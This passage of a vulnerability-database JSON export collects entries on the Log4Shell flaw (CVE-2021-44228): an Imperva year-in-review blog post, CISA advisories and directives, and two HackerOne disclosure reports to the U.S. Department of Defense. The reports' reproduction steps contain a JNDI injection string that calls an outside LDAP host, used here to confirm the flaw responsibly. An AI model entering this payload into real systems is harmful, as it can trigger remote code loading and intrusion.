Bad bots have remained very troublesome this holiday season - check out [Imperva CEO Pam Murphy](<https://www.cbsnews.com/news/automated-bots-holiday-season-shopping/>) explaining the scope of the problem on CBS News.\n\n### Where to get help\n\nImperva [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>) (ABP) protects eCommerce platforms from bad bots like Grinchbots that abuse business logic and make it nearly impossible for human customers to buy. ABP protects your real eCommerce traffic without any dropoff in website performance, ensuring an optimal customer experience and business continuity. Advanced Bot Protection can mitigate all OWASP automated threats including scalping, account takeover, web scraping and more.\n\n## 4\\. [How to Stop DDoS Attacks on Online Gamers](<https://www.imperva.com/blog/game-over-how-to-stop-ddos-attacks-on-online-gamers/>)\n\n### Why DDoS attacks on gaming deserve your attention\n\nGamers are high-value targets for cyber attackers; their high-spec machines alone are a valuable resource for cryptocurrency miners, not to mention attacks on players, platforms and studios. Anyone can launch a DoS/DDoS attack on individual gamers or entire networks, without programming knowledge. \u201cDDoS as a Service\u201d attacks can be rented online for as little as $10, complete with technical support. And if the bad guys can do it to a Fortnite World Cup team, they can do it to you, too.\n\n### Where to get help\n\nGaming platform or not, if you are interested in protecting your infrastructure from attack, you can [learn more here](<https://www.imperva.com/products/infrastructure-ddos-protection-services/>) about how Imperva can keep your players safe on the digital landscape. If you\u2019re an ISP, you can find out more about protecting against network take-downs by DDoS and bad bots [here](<https://www.imperva.com/solutions/protection-for-telecoms-and-isps/>).\n\n## [3\\. 
Why Data Security and Privacy in the Digital Age are Crucial](<https://www.imperva.com/blog/why-data-security-and-privacy-in-the-digital-age-are-crucial/>)\n\n### Why data privacy deserves your attention\n\nFor many years, people have trusted organizations like banks and healthcare to handle their most sensitive personal and financial information. Today, in a highly-connected and digitized world, the routes to accessing that data have multiplied, making it much more vulnerable to a breach. A data breach can have catastrophic consequences in any industry, but they are particularly disastrous for enterprises that have built their customer base on trust. With so many tech newcomers waiting to take their customers, a publicly-announced data breach could erode that trust enough to create serious financial fallout for an organization.\n\n### Where to get help\n\n[Imperva Data Privacy](<https://www.imperva.com/products/data-privacy/>) reaches down into the intelligence layer and cuts through the massive quantities of raw data to make it easier and less costly to discover, classify, and analyze sensitive data. You can automatically probe your organization\u2019s data for specific types of sensitive data and trigger appropriate action when required. Armed with this functionality, organizations can automate subject right request responses, delete sensitive personal data on-demand, and prove regulation compliance to auditors. You can [start for free today](<https://www.imperva.com/free-trial/?prod=cloud-data-security>).\n\n## [2\\. Software Supply Chain Attacks: From Formjacking to Third Party Code Changes](<https://www.imperva.com/blog/software-supply-chain-attacks-from-formjacking-to-third-party-code-changes/>)\n\n### Why software supply chain attacks deserve your attention\n\nToday, vulnerabilities are being introduced in even the most rigorous software development lifecycle. 
And as we know, traditional application scanning tools are failing to identify every vulnerability. As your organization becomes more dependent on third-party software components and your applications and [APIs](<https://www.imperva.com/learn/application-security/web-api-security/>) are exposed to additional risk, you\u2019ll need proactive controls to mitigate the impact of these new supply chain attack vectors.\n\n### Where to get help\n\nFor supply chain attacks aimed at establishing a foothold and moving laterally across your network, you need a fast and easy way to mitigate risks with a positive security model that analyzes an application\u2019s behavior. By identifying all expected activity, you easily expose high-risk and suspicious behavior. Imperva\u2019s [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) uses a lightweight security plug-in to clearly analyze activity within the application to block unwanted actions, such as a third-party library suddenly establishing a network connection to an external site for C2. RASP protects applications, runtime, servers, open-source dependencies, and third-party libraries. Imperva RASP deploys in minutes by easily snapping into an application without requiring any code changes, and it requires no ongoing signature updates. [Learn more.](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>)\n\n## [1\\. How Imperva Is Protecting Customers & Staying Ahead of CVE-2021-44228](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>)\n\n### Why CVE-2021-44228 deserves your attention\n\nThis [zero-day vulnerability](<https://www.imperva.com/learn/application-security/zero-day-exploit/>) has only been with us for a couple of weeks, but it\u2019s taking up a lot of air, and with good reason. 
CVE-2021-44228 allows for unauthenticated remote code execution and is having a big impact on all organizations running Java workloads. Security teams are scrambling to immediately patch their software and upgrade third-party components to meet SLAs. Initial attack peaks reached roughly 280K/hour and as with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.\n\n### Where to get help\n\nImplementing [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) provides a broader defense-in-depth strategy for enterprises to protect their applications and APIs. Some Imperva customers, including from the eCommerce and Telecom industries, have been able to save thousands of hours in emergency patching and speed up the secure software development lifecycle. Customers that have RASP deployed across their Java applications are protected from RCEs related to CVE-2021-44228.\n\nThe post [2021 in Review, Part 1: 5 Cybersecurity Topics that Made News](<https://www.imperva.com/blog/2021-in-review-part-1-5-cybersecurity-topics-that-made-news/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-28T14:08:23", "type": "impervablog", "title": "2021 in Review, Part 1: 5 Cybersecurity Topics that Made News", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-28T14:08:23", "id": "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "href": "https://www.imperva.com/blog/2021-in-review-part-1-5-cybersecurity-topics-that-made-news/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "wallarmlab": [{"lastseen": "2021-12-10T20:39:02", "description": "The post [Update on Log4Shell (CVE-2021-44228)](<https://lab.wallarm.com/update-on-log4shell-cve-2021-44228/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {}, "published": "2021-12-10T20:22:36", "type": "wallarmlab", "title": "Update on Log4Shell (CVE-2021-44228)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T20:22:36", "id": "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "href": "https://lab.wallarm.com/update-on-log4shell-cve-2021-44228/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-10T22:37:12", "description": "The post [5 things you need to know about Log4Shell (CVE-2021-44228)](<https://lab.wallarm.com/5-things-you-need-to-know-about-log4shell-cve-2021-44228/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {}, "published": "2021-12-10T20:40:07", "type": "wallarmlab", "title": "5 things you need to know about Log4Shell (CVE-2021-44228)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T20:40:07", "id": "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884", "href": "https://lab.wallarm.com/5-things-you-need-to-know-about-log4shell-cve-2021-44228/", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": 
"2023-05-23T16:48:29", "bounty": 0.0, "description": "#Report\n\n**Description:**\n\nhttps://vulners.com/cve/CVE-2021-44228\n\n## Impact\n\nProbably arbitrary code execution\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-44228\n\n## Steps to Reproduce\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588https%3A%2F%2F\u2588\u2588\u2588%2F\n2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field\n3. Enter a random password\n4. Submit\n\nObserve that a request was made to your DNS server. This strongly suggests a vulnerable log4j.\n\n## Suggested Mitigation/Remediation Actions\nUpdate log4j or disable jndi support.\n\n\n\n#Activity Timeline\n\n2021-12-10 18:16 (-0600) (comment)\nGreetings from the Department of Defense (DoD),\n\nThank you for supporting the DoD Vulnerability Disclosure Program (VDP).\n\nBy submitting this report, you acknowledge understanding of, and agreement to, the DoD Vulnerability Disclosure Policy as detailed at @DeptofDefense.\n\nThe VDP Team will review your report to ensure compliance with the DoD Vulnerability Disclosure Policy. If your report is determined to be out-of-scope, it will be closed without action.\n\nWe will attempt to validate in-scope vulnerability reports and may request additional information from you if necessary. 
We will forward reports with validated vulnerabilities to DoD system owners for their action.\n\nOur goal is to provide you with status updates not less than every two weeks until the reported vulnerability is resolved.\n\nRegards,\n\nThe VDP Team\n\n---\n\n2021-12-13 08:29 (-0600): @agent-l8 (report severity updated)\nnull\n\n---\n\n2021-12-13 08:29 (-0600): @agent-l8 (bug triaged)\nGreetings,\n\nWe have validated the vulnerability you reported and are preparing to forward this report to the affected DoD system owner for resolution.\n\nThank you for bringing this vulnerability to our attention!\n\nWe will endeavor to answer any questions the system owners may have regarding this report; however, there is a possibility we will need to contact you if they require more information to resolve the vulnerability.\n\nYou will receive another status update after we have confirmed your report has been resolved by the system owner. If you have any questions, please let me know.\n\nThanks again for supporting the DoD Vulnerability Disclosure Program.\n\nRegards,\n\nThe VDP Team\n\n---\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T00:55:49", "type": "hackerone", "title": "U.S. 
Dept Of Defense: \u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 running a vulnerable log4j", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T19:35:32", "id": "H1:1438393", "href": "https://hackerone.com/reports/1438393", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T16:48:28", "bounty": 0.0, "description": "**Description:**\n\nhttps://vulners.com/cve/CVE-2021-44228\n\n## Impact\n\nProbably arbitrary code execution\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-44228\n\n## Steps to Reproduce\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/\u2588\u2588\u2588\u2588\u2588\u2588\u2588https%3A%2F%2F\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588%2F\n2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field\n3. Enter a random password\n4. Submit\n\nObserve that a request was made to your DNS server. 
This strongly suggests a vulnerable log4j.\n\n## Suggested Mitigation/Remediation Actions\nUpdate log4j or disable jndi support.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T00:16:38", "type": "hackerone", "title": "U.S. Dept Of Defense: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 running a vulnerable log4j", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T19:33:44", "id": "H1:1423496", "href": "https://hackerone.com/reports/1423496", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-06-24T13:56:24", "description": "CISA and the United States Coast Guard Cyber Command (CGCYBER) have released a joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon\u00ae and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches. 
The CSA provides information\u2014including tactics, techniques, and procedures and indicators of compromise\u2014derived from two related incident response engagements and malware analysis of samples discovered on the victims\u2019 networks.\n\nCISA and CGCYBER encourage users and administrators to update all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following [VMware\u2019s release of updates for Log4Shell](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>), treat all affected VMware systems as compromised. See joint CSA [Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems](<https://www.cisa.gov/uscert/ncas/alerts/aa22-174a>) for more information and additional recommendations. \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/23/malicious-cyber-actors-continue-exploit-log4shell-vmware-horizon>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-23T00:00:00", "type": "cisa", "title": "Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-23T00:00:00", "id": "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/23/malicious-cyber-actors-continue-exploit-log4shell-vmware-horizon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T18:09:48", "description": "CISA has issued [Emergency Directive (ED) 22-02: Mitigate Apache Log4j Vulnerability](<https://www.cisa.gov/emergency-directive-22-02>), directing federal civilian executive branch (FCEB) agencies to address Log4j vulnerabilities\u2014most notably, [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>).\n\nAlthough ED 22-02 applies to FCEB agencies, CISA strongly recommends that all organizations review [ED 22-02](<https://www.cisa.gov/emergency-directive-22-02>) for mitigation guidance. 
For additional details, see CISA\u2019s webpage [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T00:00:00", "type": "cisa", "title": "CISA Issues ED 22-02 Directing Federal Agencies to Mitigate Apache Log4j Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T00:00:00", "id": "CISA:920F1DA8584B18459D4963D91C8DDA33", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:08:18", "description": "CISA and its partners, through the [Joint Cyber Defense Collaborative](<https://www.cisa.gov/jcdc>), are tracking and responding to active, widespread exploitation of a critical remote code execution vulnerability (CVE-2021-44228) affecting Apache Log4j software library versions 2.0-beta9 to 2.14.1. Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications\u2014as well as in operational technology products\u2014to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to take control of an affected system.\n\nIn response, CISA has created a webpage, [Apache Log4j Vulnerability Guidance](<https://cisa.gov/uscert/apache-log4j-vulnerability-guidance>) and will actively maintain a [community-sourced GitHub repository](<https://github.com/cisagov/log4j-affected-db>) of publicly available information and vendor-supplied advisories regarding the Log4j vulnerability. CISA will continually update both the webpage and the GitHub repository.\n\nCISA urges organizations to review its [Apache Log4j Vulnerability Guidance](<https://cisa.gov/uscert/apache-log4j-vulnerability-guidance>) webpage and upgrade to Log4j version 2.15.0, or apply the appropriate vendor recommended mitigations immediately. CISA will continue to update the webpage as additional information becomes available. 
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T00:00:00", "type": "cisa", "title": "CISA Creates Webpage for Apache Log4j Vulnerability CVE-2021-44228", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T00:00:00", "id": "CISA:8367DA0C1A6F51FB2D817745BB204C48", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/13/cisa-creates-webpage-apache-log4j-vulnerability-cve-2021-44228", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2022-12-09T06:30:46", "description": "log4j is vulnerable to remote code execution. 